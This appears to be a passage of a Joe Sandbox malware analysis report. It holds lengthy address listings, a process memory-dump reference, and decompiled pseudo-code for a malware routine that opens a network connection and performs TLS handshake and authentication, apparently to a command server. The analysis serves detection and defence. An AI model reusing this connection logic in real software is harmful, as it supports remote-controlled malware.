                    0x00414e6d
                    0x00414e78
                    0x00414e7d
                    0x00414e8a
                    0x00414e93
                    0x00414e9d
                    0x00414ea0
                    0x00414ea2
                    0x00415bc2
                    0x00415bc8
                    0x00415bcb
                    0x00415bd8
                    0x00000000
                    0x00415c04
                    0x00415c0d
                    0x00415c0f
                    0x00415c1b
                    0x00415c1d
                    0x00000000
                    0x00000000
                    0x00415c29
                    0x00415c32
                    0x00415c34
                    0x00415c3a
                    0x00415c42
                    0x00415c46
                    0x00415c4d
                    0x00415c4f
                    0x00415c55
                    0x00415c57
                    0x00415c5b
                    0x00415c61
                    0x00415c65
                    0x00415c6c
                    0x00415c70
                    0x00415c72
                    0x00415c77
                    0x00415c79
                    0x00415c7b
                    0x00415c80
                    0x00415c89
                    0x00415c8b
                    0x00415c8d
                    0x00000000
                    0x00000000
                    0x00415d67
                    0x00415d70
                    0x00415d72
                    0x00415d7a
                    0x00415d83
                    0x00415d85
                    0x00415d92
                    0x00000000
                    0x00000000
                    0x00415e1a
                    0x00415e1c
                    0x00415e21
                    0x00415e26
                    0x00415e2b
                    0x00415e2d
                    0x00415e32
                    0x00415e36
                    0x00415e37
                    0x00415e39
                    0x00415e52
                    0x00415e57
                    0x00415e5a
                    0x00415e5d
                    0x00415e62
                    0x00415e3b
                    0x00415e3b
                    0x00415e40
                    0x00415e43
                    0x00415e46
                    0x00415e4b
                    0x00415e4b
                    0x00415e67
                    0x00000000
                    0x00000000
                    0x00415e73
                    0x00415e77
                    0x00415e7c
                    0x00415e7f
                    0x00415e87
                    0x00000000
                    0x00000000
                    0x00415bf0
                    0x00415bf5
                    0x00000000
                    0x00000000
                    0x00415d9f
                    0x00415da3
                    0x00415da8
                    0x00415dab
                    0x00415db3
                    0x00000000
                    0x00000000
                    0x00415dbf
                    0x00415dc3
                    0x00415dc8
                    0x00415dcb
                    0x00415dd3
                    0x00000000
                    0x00000000
                    0x00415f1a
                    0x00000000
                    0x00000000
                    0x00415f24
                    0x00000000
                    0x00000000
                    0x00415f2e
                    0x00000000
                    0x00000000
                    0x00415ee8
                    0x00415eea
                    0x00415ef5
                    0x00415ef7
                    0x00415efe
                    0x00415f02
                    0x00415f04
                    0x00415f07
                    0x00415f0c
                    0x00415f0e
                    0x00415f10
                    0x00000000
                    0x00000000
                    0x00415e91
                    0x00000000
                    0x00000000
                    0x00415f38
                    0x00415f3f
                    0x00415f87
                    0x00415f89
                    0x00000000
                    0x00000000
                    0x00415f41
                    0x00415f43
                    0x00415f47
                    0x00415f4c
                    0x00415f52
                    0x00415f56
                    0x00415f59
                    0x00415f62
                    0x00415f64
                    0x00415f6e
                    0x00415f70
                    0x00415f72
                    0x00415f78
                    0x00000000
                    0x00415f78
                    0x00000000
                    0x00000000
                    0x00415e9b
                    0x00415ea2
                    0x00415edd
                    0x00415ea4
                    0x00415ea4
                    0x00415ea6
                    0x00415eab
                    0x00415eb7
                    0x00415ebd
                    0x00415ebd
                    0x00000000
                    0x00000000
                    0x00415d55
                    0x00000000
                    0x00000000
                    0x00415d5c
                    0x00415d5e
                    0x00415d5f
                    0x00000000
                    0x00000000
                    0x00415ca0
                    0x00415ca7
                    0x00415cae
                    0x00415cb2
                    0x00415cb7
                    0x00415cba
                    0x00415cbd
                    0x00415cc4
                    0x00415cc8
                    0x00415ccd
                    0x00415cd0
                    0x00415cd3
                    0x00415cda
                    0x00415cde
                    0x00415ce3
                    0x00415ce6
                    0x00415ce9
                    0x00415cee
                    0x00415cf5
                    0x00415cfa
                    0x00415d01
                    0x00000000
                    0x00000000
                    0x00415ddd
                    0x00415de1
                    0x00415dea
                    0x00415dec
                    0x00415df1
                    0x00415df4
                    0x00415df7
                    0x00415dfc
                    0x00415e01
                    0x00415e0b
                    0x00415e0d
                    0x00415e12
                    0x00000000
                    0x00000000
                    0x00415f99
                    0x00415f9d
                    0x00415fa4
                    0x00415fa8
                    0x00415fb1
                    0x00415fba
                    0x00415fbc
                    0x00415fc6
                    0x00415fc8
                    0x00415fd2
                    0x00415fd4
                    0x00415fd8
                    0x00415fdd
                    0x00415fe1
                    0x00415fe6
                    0x00000000
                    0x00000000
                    0x00415d0d
                    0x00415d16
                    0x00415d18
                    0x00415d24
                    0x00415d26
                    0x00000000
                    0x00000000
                    0x00415d32
                    0x00415d3b
                    0x00415d3d
                    0x00415d49
                    0x00415d4b
                    0x00000000
                    0x00000000
                    0x00415fef
                    0x00415ff3
                    0x00415ffa
                    0x00416003
                    0x00416005
                    0x0041600a
                    0x0041600e
                    0x00416010
                    0x00416015
                    0x00416018
                    0x0041601c
                    0x0041601e
                    0x00416022
                    0x00416023
                    0x0041602b
                    0x0041602f
                    0x00416038
                    0x0041603a
                    0x00416041
                    0x00000000
                    0x00000000
                    0x0041604a
                    0x00416053
                    0x00416055
                    0x0041605c
                    0x00416060
                    0x00416062
                    0x00416067
                    0x00416069
                    0x0041606b
                    0x00416070
                    0x00416074
                    0x0041607b
                    0x00416084
                    0x00416086
                    0x0041608b
                    0x0041608f
                    0x00416091
                    0x00416096
                    0x00416099
                    0x0041609d
                    0x0041609f
                    0x004160a3
                    0x004160a4
                    0x004160ac
                    0x004160ae
                    0x004160b3
                    0x004160ba
                    0x004160bf
                    0x004160bf
                    0x004160c0
                    0x004160c2
                    0x004160c6
                    0x004160cb
                    0x004160cc
                    0x004160ce
                    0x004160d2
                    0x004160d7
                    0x004160d8
                    0x004160da
                    0x004160dc
                    0x004160e1
                    0x004160e2
                    0x004160e7
                    0x004160ec
                    0x004160f1
                    0x004160f5
                    0x004160fa
                    0x004160fe
                    0x00416103
                    0x0041610a
                    0x0041610a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00415bd8
                    0x00000000
                    0x00414ea8
                    0x00414ea8
                    0x00415ad0
                    0x00415aed
                    0x00415af8
                    0x00415b02
                    0x00415b12
                    0x00415b12
                    0x00415b15
                    0x00415b1a
                    0x00415b20
                    0x00415b2b
                    0x00415b36
                    0x00415b53
                    0x00415b70
                    0x00415b7c
                    0x00415b81
                    0x00415b89
                    0x00415bac
                    0x00415bac
                    0x00415bb8
                    0x00000000
                    0x00414eae
                    0x00414eae
                    0x00414eb2
                    0x00416118
                    0x0041611c
                    0x00416128
                    0x00416134
                    0x00416141
                    0x00414eb8
                    0x00414eba
                    0x00000000
                    0x00414ecd
                    0x00414ee4
                    0x00414ef2
                    0x00414f00
                    0x00414f5b
                    0x00414f5f
                    0x00414f6a
                    0x00414f6e
                    0x00414f77
                    0x00414f83
                    0x00414f8f
                    0x00414f9b
                    0x00414fa7
                    0x00414fb3
                    0x00414fbf
                    0x00414fc8
                    0x00414fd1
                    0x00414fe9
                    0x00414ff1
                    0x0041501e
                    0x00415023
                    0x0041502a
                    0x0041502f
                    0x00415031
                    0x00415037
                    0x00415038
                    0x00000000
                    0x00415038
                    0x00414ff3
                    0x00414ff5
                    0x00414fff
                    0x0041500f
                    0x00415001
                    0x00415002
                    0x00415002
                    0x00414fff
                    0x00000000
                    0x00000000
                    0x0041506d
                    0x0041506f
                    0x0041503a
                    0x0041503a
                    0x00000000
                    0x00000000
                    0x00415a65
                    0x00415a69
                    0x00415a6e
                    0x00415a71
                    0x00415a73
                    0x00415a75
                    0x00415a7a
                    0x00415a7c
                    0x00415a81
                    0x00415a86
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041507d
                    0x00415084
                    0x00415089
                    0x0041508c
                    0x00415093
                    0x00415095
                    0x004150a0
                    0x004150a2
                    0x004150ac
                    0x004150ae
                    0x004150b0
                    0x004150b6
                    0x00000000
                    0x00000000
                    0x004150d6
                    0x004150df
                    0x004150e1
                    0x004150ed
                    0x004150ef
                    0x00000000
                    0x00000000
                    0x00415177
                    0x00415177
                    0x00000000
                    0x00000000
                    0x004150fb
                    0x00415104
                    0x00415106
                    0x00415113
                    0x00000000
                    0x00000000
                    0x0041511e
                    0x00000000
                    0x00000000
                    0x00415145
                    0x00415120
                    0x00415120
                    0x00415122
                    0x00415122
                    0x0041512b
                    0x0041512d
                    0x0041513a
                    0x00000000
                    0x00000000
                    0x00415149
                    0x00415150
                    0x00415159
                    0x0041515b
                    0x00415168
                    0x0041516e
                    0x00415172
                    0x00000000
                    0x00000000
                    0x00415181
                    0x00415183
                    0x0041518f
                    0x00415191
                    0x00415197
                    0x0041519b
                    0x004151a1
                    0x004151a6
                    0x004151b0
                    0x004151c3
                    0x004151c9
                    0x004151cd
                    0x004151d2
                    0x00000000
                    0x00000000
                    0x004151dd
                    0x004151e1
                    0x004151e7
                    0x004151ec
                    0x004151f1
                    0x004151f7
                    0x004151ff
                    0x00415203
                    0x00415208
                    0x0041520b
                    0x00415213
                    0x00000000
                    0x00415213
                    0x00000000
                    0x00000000
                    0x0041521f
                    0x00415221
                    0x0041522d
                    0x0041523b
                    0x00000000
                    0x00000000
                    0x00415248
                    0x00415251
                    0x00415253
                    0x00415259
                    0x00415261
                    0x00415265
                    0x00415267
                    0x0041526d
                    0x00415271
                    0x00415276
                    0x0041527b
                    0x0041527f
                    0x00415284
                    0x00415288
                    0x0041528a
                    0x0041528c
                    0x004152b4
                    0x004152b9
                    0x004152bc
                    0x004152bf
                    0x004152c4
                    0x004152c7
                    0x004152cb
                    0x004152ce
                    0x004152d3
                    0x0041528e
                    0x0041528e
                    0x00415293
                    0x00415296
                    0x00415299
                    0x0041529e
                    0x004152a1
                    0x004152a5
                    0x004152a8
                    0x004152ad
                    0x004152ad
                    0x004152d8
                    0x004152da
                    0x004152e2
                    0x004152eb
                    0x004152ed
                    0x004152f3
                    0x004152f8
                    0x004152fb
                    0x004152fe
                    0x00415302
                    0x0041530d
                    0x00415315
                    0x0041531c
                    0x0041531e
                    0x00000000
                    0x00000000
                    0x00415044
                    0x00415048
                    0x0041504d
                    0x00415050
                    0x00415054
                    0x00415057
                    0x0041505c
                    0x0041505e
                    0x00415063
                    0x0041610f
                    0x0041610f
                    0x00000000
                    0x00000000
                    0x0041532a
                    0x0041532e
                    0x00415333
                    0x00415336
                    0x00415339
                    0x0041533e
                    0x00415343
                    0x00000000
                    0x00000000
                    0x0041534d
                    0x00415352
                    0x00000000
                    0x00000000
                    0x0041535c
                    0x00415361
                    0x00000000
                    0x00000000
                    0x0041536d
                    0x00415371
                    0x00415377
                    0x0041537c
                    0x00415381
                    0x00000000
                    0x00000000
                    0x00415390
                    0x00415390
                    0x00415396
                    0x0041539c
                    0x004153a1
                    0x004153a4
                    0x004153a7
                    0x004153ae
                    0x004153b2
                    0x004153b7
                    0x004153ba
                    0x004153bd
                    0x004153c2
                    0x004153c7
                    0x00000000
                    0x00000000
                    0x004153d7
                    0x004153dc
                    0x004153de
                    0x004153e3
                    0x00415386
                    0x00415386
                    0x00000000
                    0x00000000
                    0x00415aaf
                    0x00415ab0
                    0x00415ab5
                    0x00415abb
                    0x00415abd
                    0x00415abf
                    0x00415abf
                    0x00000000
                    0x00000000
                    0x004153e7
                    0x004153e9
                    0x004153ee
                    0x004153f3
                    0x004153f9
                    0x004153fb
                    0x00415400
                    0x00415405
                    0x00415407
                    0x0041540d
                    0x0041540f
                    0x00415414
                    0x00415417
                    0x00415419
                    0x0041541a
                    0x00415420
                    0x0041542b
                    0x00415422
                    0x00415422
                    0x00415427
                    0x00415432
                    0x00415434
                    0x0041543f
                    0x00415441
                    0x00000000
                    0x00000000
                    0x0041544b
                    0x00415451
                    0x00415456
                    0x00000000
                    0x00000000
                    0x00415460
                    0x00415462
                    0x00415468
                    0x0041546e
                    0x00415473
                    0x00415476
                    0x00415479
                    0x00415480
                    0x00415489
                    0x00415491
                    0x0041549a
                    0x004154a3
                    0x004154a5
                    0x004154ab
                    0x004154b2
                    0x004154b6
                    0x004154bd
                    0x004154bf
                    0x004154c5
                    0x004154cb
                    0x004154cd
                    0x004154cf
                    0x00000000
                    0x00000000
                    0x004154dc
                    0x004154dd
                    0x004154e2
                    0x004154f5
                    0x00000000
                    0x00000000
                    0x00415500
                    0x00415500
                    0x00415501
                    0x00415506
                    0x0041550c
                    0x00415511
                    0x00415514
                    0x00415517
                    0x0041551e
                    0x00415522
                    0x00415527
                    0x0041552a
                    0x00415532
                    0x00415537
                    0x004153cc
                    0x004153cc
                    0x00000000
                    0x00000000
                    0x00415541
                    0x0041554a
                    0x00415552
                    0x00000000
                    0x00000000
                    0x0041555d
                    0x00415564
                    0x00000000
                    0x00415572
                    0x00415572
                    0x00415578
                    0x00000000
                    0x00000000
                    0x0041556c
                    0x0041556c
                    0x0041557b
                    0x0041557d
                    0x0041557d
                    0x00416144
                    0x0041614c
                    0x00416150
                    0x00416151
                    0x00416152
                    0x00416153
                    0x00416156
                    0x00416157
                    0x00416159
                    0x0041615a
                    0x0041615b
                    0x0041615d
                    0x0041615e
                    0x0041615f
                    0x00416162
                    0x00416163
                    0x00416165
                    0x00416166
                    0x00416167
                    0x0041616a
                    0x0041616b
                    0x0041616d
                    0x0041616e
                    0x0041616f
                    0x00416171
                    0x00416172
                    0x00416173
                    0x00416176
                    0x00416177
                    0x0041617a
                    0x0041617b
                    0x00416181
                    0x00416182
                    0x00416183
                    0x00416189
                    0x0041618a
                    0x0041618b
                    0x0041618f
                    0x00416191
                    0x00416192
                    0x00416193
                    0x00416196
                    0x00416197
                    0x0041619b
                    0x0041619e
                    0x0041619f
                    0x004161a5
                    0x004161a6
                    0x004161a7
                    0x004161ad
                    0x004161ae
                    0x004161af
                    0x004161b1
                    0x004161b2
                    0x004161b3
                    0x004161b5
                    0x004161b6
                    0x004161b7
                    0x004161ba
                    0x004161bb
                    0x004161be
                    0x004161bf
                    0x004161c1
                    0x004161c2
                    0x004161c3
                    0x004161c5
                    0x004161c6
                    0x004161c7
                    0x004161c9
                    0x004161ca
                    0x004161cb
                    0x004161ce
                    0x004161cf
                    0x004161d2
                    0x004161d3
                    0x004161d9
                    0x004161da
                    0x004161db
                    0x004161e1
                    0x004161e2
                    0x004161e3
                    0x004161e5
                    0x004161e6
                    0x004161e7
                    0x004161ee
                    0x004161ef
                    0x004161f5
                    0x004161f6
                    0x004161f7
                    0x004161f9
                    0x004161fa
                    0x004161fb
                    0x00416201
                    0x00416202
                    0x00416203
                    0x00416209
                    0x0041620a
                    0x0041620b
                    0x0041620d
                    0x0041620e
                    0x0041620f
                    0x00416212
                    0x00416213
                    0x00416215
                    0x00416216
                    0x00416217
                    0x0041621d
                    0x0041621e
                    0x0041621f
                    0x00416221
                    0x00416222
                    0x00416223
                    0x00416226
                    0x00416227
                    0x00416229
                    0x0041622a
                    0x0041622b
                    0x0041622e
                    0x0041622f
                    0x00416231
                    0x00416232
                    0x00416233
                    0x00416239
                    0x0041623a
                    0x0041623b
                    0x0041623d
                    0x0041623e
                    0x0041623f
                    0x00416242
                    0x00416243
                    0x00416245
                    0x00416246
                    0x00416247
                    0x00416249
                    0x0041624a
                    0x0041624b
                    0x00416251
                    0x00416252
                    0x00416253
                    0x00416259
                    0x0041625a
                    0x0041625b
                    0x0041625f
                    0x00416265
                    0x00416266
                    0x00416267
                    0x0041626d
                    0x0041626e
                    0x0041626f
                    0x00416271
                    0x00416272
                    0x00416273
                    0x00416275
                    0x00416276
                    0x00416277
                    0x0041627a
                    0x0041627b
                    0x0041627d
                    0x0041627e
                    0x0041627f
                    0x00416281
                    0x00416283
                    0x00416285
                    0x00416287
                    0x00416289
                    0x0041628a
                    0x0041628b
                    0x0041628d
                    0x0041628f
                    0x00416291
                    0x00416293
                    0x00416295
                    0x00416297
                    0x00416299
                    0x0041629b
                    0x004162a0
                    0x004162a2
                    0x004162a4
                    0x004162a6
                    0x004162a8
                    0x004162aa
                    0x004162ac
                    0x004162ae
                    0x004162b0
                    0x004162b2
                    0x004162b4
                    0x004162b6
                    0x004162b8
                    0x004162ba
                    0x004162bb
                    0x004162bc
                    0x004162bd
                    0x004162c1
                    0x004162c9
                    0x004162cb
                    0x004162cc
                    0x00000000
                    0x00000000
                    0x00415f8f
                    0x00415f8f
                    0x00000000
                    0x00000000
                    0x00415587
                    0x00415587
                    0x0041558d
                    0x00000000
                    0x00000000
                    0x00415581
                    0x00415581
                    0x0041558f
                    0x00415591
                    0x0041559b
                    0x0041559d
                    0x004155a4
                    0x004155a8
                    0x004155af
                    0x004155b1
                    0x004155b6
                    0x004155b8
                    0x004155bd
                    0x004155c3
                    0x004155c4
                    0x004155c5
                    0x004155ce
                    0x004155d1
                    0x004155da
                    0x004155dc
                    0x004155e1
                    0x004155e2
                    0x004155e3
                    0x004155e9
                    0x004155eb
                    0x004155f1
                    0x004155f4
                    0x004155f8
                    0x00415600
                    0x00415605
                    0x00415605
                    0x00000000
                    0x00000000
                    0x0041560f
                    0x00415616
                    0x0041561c
                    0x00415623
                    0x00415628
                    0x0041562b
                    0x00415632
                    0x00415637
                    0x00415639
                    0x00415640
                    0x0041564c
                    0x00415653
                    0x00415658
                    0x0041565f
                    0x00000000
                    0x00000000
                    0x0041566b
                    0x00415674
                    0x00415676
                    0x00415682
                    0x00415687
                    0x00415693
                    0x00415695
                    0x0041569b
                    0x0041569d
                    0x004156a7
                    0x004156a9
                    0x004156b0
                    0x004156b7
                    0x004156bb
                    0x004156bd
                    0x004156c2
                    0x004156c5
                    0x004156c9
                    0x004156cb
                    0x004156d8
                    0x004156da
                    0x004156e4
                    0x004156e6
                    0x004156e8
                    0x004156ee
                    0x004150b8
                    0x004150b8
                    0x004150bd
                    0x004150c2
                    0x004150c6
                    0x004150cb
                    0x00416113
                    0x00416113
                    0x00000000
                    0x00000000
                    0x004156f5
                    0x004156fa
                    0x004156fc
                    0x00415701
                    0x00415706
                    0x0041570b
                    0x0041570d
                    0x00415712
                    0x00415716
                    0x00415717
                    0x00415719
                    0x00415731
                    0x00415736
                    0x0041573b
                    0x0041573d
                    0x00415742
                    0x00415746
                    0x00415747
                    0x00415749
                    0x00415764
                    0x00415769
                    0x0041576e
                    0x00415770
                    0x00415775
                    0x00415777
                    0x004157ac
                    0x004157b3
                    0x004157ba
                    0x004157be
                    0x004157c0
                    0x004157c5
                    0x004157ca
                    0x004157cc
                    0x004157d1
                    0x004157d2
                    0x004157d4
                    0x004157da
                    0x004157de
                    0x004157e3
                    0x004157e8
                    0x004157ea
                    0x004157ef
                    0x004157f1
                    0x004157f7
                    0x004157f8
                    0x004157f9
                    0x00000000
                    0x004157f9
                    0x004157d6
                    0x004157d6
                    0x004157d7
                    0x004157fb
                    0x004157fb
                    0x004157fb
                    0x00415779
                    0x00415779
                    0x0041577c
                    0x00415785
                    0x00415787
                    0x0041578d
                    0x00415792
                    0x00415792
                    0x00000000
                    0x00415792
                    0x0041574b
                    0x00415752
                    0x00415754
                    0x0041575a
                    0x0041575f
                    0x00000000
                    0x0041575f
                    0x0041571b
                    0x00415722
                    0x00415724
                    0x0041572a
                    0x00415795
                    0x00415795
                    0x00415797
                    0x00415797
                    0x00000000
                    0x00000000
                    0x0041589c
                    0x0041589d
                    0x004158a3
                    0x004158a5
                    0x004158b3
                    0x004158bd
                    0x004158c5
                    0x004158cb
                    0x004158d2
                    0x004158d6
                    0x004158da
                    0x004158df
                    0x004158e2
                    0x004158e6
                    0x004158e8
                    0x004158ed
                    0x004158ef
                    0x004158f4
                    0x00415c92
                    0x00415c92
                    0x00415c96
                    0x00415c96
                    0x00415c96
                    0x00000000
                    0x00000000
                    0x00415809
                    0x0041580b
                    0x00415811
                    0x00415818
                    0x00415821
                    0x00415823
                    0x00415828
                    0x00415837
                    0x0041583a
                    0x00415841
                    0x00415845
                    0x0041584c
                    0x0041584e
                    0x00415855
                    0x0041585e
                    0x00415879
                    0x00000000
                    0x00415879
                    0x00000000
                    0x00000000
                    0x00415882
                    0x00415888
                    0x0041588a
                    0x00415890
                    0x00415896
                    0x00415896
                    0x00000000
                    0x00415896
                    0x00000000
                    0x00000000
                    0x004158fe
                    0x00415900
                    0x0041590a
                    0x0041590c
                    0x00415912
                    0x00415916
                    0x0041591d
                    0x0041591f
                    0x00415924
                    0x00415926
                    0x00415928
                    0x00000000
                    0x00000000
                    0x00415932
                    0x00415936
                    0x0041593a
                    0x0041593e
                    0x00415942
                    0x0041594b
                    0x0041594d
                    0x00415952
                    0x00415956
                    0x00415958
                    0x0041595e
                    0x00415961
                    0x00415967
                    0x0041596b
                    0x00415978
                    0x0041597d
                    0x00000000
                    0x00000000
                    0x00415983
                    0x00000000
                    0x00000000
                    0x0041598f
                    0x00415993
                    0x00415998
                    0x0041599b
                    0x004159a3
                    0x00000000
                    0x00000000
                    0x004159af
                    0x004159b3
                    0x004159b8
                    0x004159bb
                    0x004159c3
                    0x00000000
                    0x00000000
                    0x004159cf
                    0x004159d3
                    0x004159d8
                    0x004159db
                    0x004159e3
                    0x00000000
                    0x00000000
                    0x004159ed
                    0x004159ee
                    0x004159f3
                    0x004159f5
                    0x004159fb
                    0x004159fd
                    0x00415a03
                    0x00415a05
                    0x00415a0f
                    0x00415a16
                    0x00415a17
                    0x00415a22
                    0x00415a24
                    0x00415a2f
                    0x00415a39
                    0x00415a3b
                    0x00000000
                    0x00000000
                    0x00415a47
                    0x00415a4b
                    0x00415a50
                    0x00415a53
                    0x00415a5b
                    0x00000000
                    0x00000000
                    0x00415a91
                    0x00415a95
                    0x00415a9a
                    0x00415a9d
                    0x00415aa5
                    0x00415bfa
                    0x00000000
                    0x00000000
                    0x00414eba
                    0x00414eb2
                    0x00414ea8
                    0x00000000

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventTick
                    • String ID: 82G$hlight$2G$4G$4G$Cqt
                    • API String ID: 180926312-2556873121
                    • Opcode ID: d62a8fa035ef45dc56afb164e10ed628e31e717e1bd2e0576287a8423718c946
                    • Instruction ID: 1006700840d6d5b1d4ae70cc5cb3dfe19242116085b8f2f801fb0bda7647f751
                    • Opcode Fuzzy Hash: d62a8fa035ef45dc56afb164e10ed628e31e717e1bd2e0576287a8423718c946
                    • Instruction Fuzzy Hash: FF0284316083015BC614FB76D857AEE72A8AF90308F50493FB942671E3EF7C9949C69B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1266 4048a8-4048c8 connect 1267 4049fb-4049ff 1266->1267 1268 4048ce-4048d1 1266->1268 1271 404a01-404a0f WSAGetLastError 1267->1271 1272 404a77 1267->1272 1269 4049f7-4049f9 1268->1269 1270 4048d7-4048da 1268->1270 1273 404a79-404a7e 1269->1273 1274 404906-404910 call 41f56b 1270->1274 1275 4048dc-404903 call 4052fe call 402073 call 41a04a 1270->1275 1271->1272 1276 404a11-404a14 1271->1276 1272->1273 1286 404921-40492e call 41f79a 1274->1286 1287 404912-40491c 1274->1287 1275->1274 1279 404a51-404a56 1276->1279 1280 404a16-404a1b call 41b45a 1276->1280 1283 404a5b-404a74 call 402073 * 2 call 41a04a 1279->1283 1285 404a20-404a4f call 4052dd call 402073 call 41a04a call 401fb8 1280->1285 1283->1272 1285->1272 1300 404930-404953 call 402073 * 2 call 41a04a 1286->1300 1301 404967-404972 call 42034b 1286->1301 1287->1283 1327 404956-404962 call 41f5ab 1300->1327 1312 4049a4-4049b1 call 41f711 1301->1312 1313 404974-4049a2 call 402073 * 2 call 41a04a call 41f9bd 1301->1313 1324 4049b3-4049d6 call 402073 * 2 call 41a04a 1312->1324 1325 4049d9-4049f4 CreateEventW * 2 1312->1325 1313->1327 1324->1325 1325->1269 1327->1272
                    C-Code - Quality: 72%
                    			E004048A8(void* __ecx, void* __esi) {
				char _v32;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t21;
				int _t22;
				void* _t26;
				signed int _t31;
				void* _t32;
				void* _t33;
				struct _SECURITY_ATTRIBUTES* _t34;
				void* _t43;
				void* _t51;
				struct _SECURITY_ATTRIBUTES* _t56;
				void* _t58;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t103;
				void* _t104;

				_t84 = __esi;
				_t21 =  *0x470adc; // 0xedf140
				_t87 = _t86 - 0x1c;
				_t82 = __ecx;
				__imp__#4( *((intOrPtr*)(__ecx + 4)),  *((intOrPtr*)(_t21 + 0x18)),  *((intOrPtr*)(_t21 + 0x10)), _t81, _t51); // executed
				if(_t21 != 0) {
					__eflags =  *((char*)(__ecx + 0x31));
					if( *((char*)(__ecx + 0x31)) != 0) {
						__imp__#111();
						_t56 = _t21 - 0x2736;
						__eflags = _t56;
						if(_t56 != 0) {
							__eflags = _t56 == 0x17;
							if(_t56 == 0x17) {
								_t88 = _t87 - 0x18;
								_t58 = _t87 - 0x18;
								_push("Connection Refused");
								goto L20;
							} else {
								_t26 = E0041B45A( &_v32, _t21); // executed
								_t91 = _t87 - 0x18;
								E004052DD(_t51, _t87 - 0x18, "Connection Failed: ", _t85, __eflags, _t26);
								E00402073(_t51, _t91 - 0x14, "Connection Failed: ", _t85, "E");
								E0041A04A(_t51, _t82);
								E00401FB8();
							}
						}
					}
					goto L21;
				} else {
					if( *((intOrPtr*)(__ecx + 1)) == _t21) {
						L14:
						_t22 = 1;
					} else {
						if( *((intOrPtr*)(__ecx + 0x31)) != _t21) {
							_t103 = _t87 - 0x18;
							_t6 = _t82 + 0x34; // 0x472f14
							_t77 = "TLS Handshake...      | ";
							E004052FE(_t103, "TLS Handshake...      | ", _t85, _t6);
							_t104 = _t103 - 0x14;
							E00402073(_t51, _t104, "TLS Handshake...      | ", _t85, "i");
							E0041A04A(_t51, _t82);
							_t87 = _t104 + 0x30;
						}
						_t31 = E0041F56B(_t51);
						 *(_t82 + 0x4c) = _t31;
						if(_t31 != 0) {
							_t80 =  *((intOrPtr*)(_t82 + 4));
							_t32 = E0041F79A(_t31,  *((intOrPtr*)(_t82 + 4)));
							__eflags = _t32 - 1;
							if(_t32 == 1) {
								_t33 = E0042034B();
								__eflags = _t33 - 1;
								if(_t33 == 1) {
									_t34 = E0041F711(_t51);
									 *((intOrPtr*)(_t82 + 0x50)) = _t34;
									__eflags = _t34;
									if(_t34 == 0) {
										_t94 = _t87 - 0x18;
										E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 3");
										E00402073(_t51, _t94 - 0x18, _t80, _t85, "E");
										E0041A04A(_t51, _t82);
									}
									__eflags = 0;
									 *((intOrPtr*)(_t82 + 0x70)) = CreateEventW(0, 0, 1, 0);
									 *((intOrPtr*)(_t82 + 0x6c)) = CreateEventW(0, 0, 1, 0);
									goto L14;
								} else {
									_t97 = _t87 - 0x18;
									E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Authentication Failed");
									E00402073(_t51, _t97 - 0x18, _t80, _t85, "E");
									_t43 = E0041F9BD(E0041A04A(_t51, _t82),  *(_t82 + 0x4c));
									goto L8;
								}
							} else {
								_t100 = _t87 - 0x18;
								E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 2");
								E00402073(_t51, _t100 - 0x18, _t80, _t85, "E");
								_t43 = E0041A04A(_t51, _t82);
								L8:
								E0041F5AB(_t43, _t51,  *(_t82 + 0x4c), _t80, _t82, _t84);
								 *(_t82 + 0x4c) =  *(_t82 + 0x4c) & 0x00000000;
								goto L21;
							}
						} else {
							_t88 = _t87 - 0x18;
							_t58 = _t87 - 0x18;
							_push("TLS Error 1");
							L20:
							E00402073(_t51, _t58, _t77, _t85);
							E00402073(_t51, _t88 - 0x18, _t77, _t85, "E");
							E0041A04A(_t51, _t82);
							L21:
							_t22 = 0;
						}
					}
				}
				return _t22;
			}


























                    0x004048a8
                    0x004048ab
                    0x004048b0
                    0x004048b8
                    0x004048c0
                    0x004048c8
                    0x004049fb
                    0x004049ff
                    0x00404a01
                    0x00404a09
                    0x00404a09
                    0x00404a0f
                    0x00404a11
                    0x00404a14
                    0x00404a51
                    0x00404a54
                    0x00404a56
                    0x00000000
                    0x00404a16
                    0x00404a1b
                    0x00404a20
                    0x00404a2b
                    0x00404a3a
                    0x00404a3f
                    0x00404a4a
                    0x00404a4a
                    0x00404a14
                    0x00404a0f
                    0x00000000
                    0x004048ce
                    0x004048d1
                    0x004049f7
                    0x004049f7
                    0x004048d7
                    0x004048da
                    0x004048dc
                    0x004048df
                    0x004048e4
                    0x004048ea
                    0x004048ef
                    0x004048f9
                    0x004048fe
                    0x00404903
                    0x00404903
                    0x00404906
                    0x0040490b
                    0x00404910
                    0x00404921
                    0x00404926
                    0x0040492b
                    0x0040492e
                    0x0040496a
                    0x0040496f
                    0x00404972
                    0x004049a7
                    0x004049ac
                    0x004049af
                    0x004049b1
                    0x004049b3
                    0x004049bd
                    0x004049cc
                    0x004049d1
                    0x004049d6
                    0x004049d9
                    0x004049eb
                    0x004049f4
                    0x00000000
                    0x00404974
                    0x00404974
                    0x0040497e
                    0x0040498d
                    0x0040499d
                    0x00000000
                    0x0040499d
                    0x00404930
                    0x00404930
                    0x0040493a
                    0x00404949
                    0x0040494e
                    0x00404956
                    0x00404959
                    0x0040495e
                    0x00000000
                    0x0040495e
                    0x00404912
                    0x00404912
                    0x00404915
                    0x00404917
                    0x00404a5b
                    0x00404a5b
                    0x00404a6a
                    0x00404a6f
                    0x00404a77
                    0x00404a77
                    0x00404a77
                    0x00404910
                    0x004048d1
                    0x00404a7e

                    APIs
                    • connect.WS2_32(?,?,?), ref: 004048C0
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
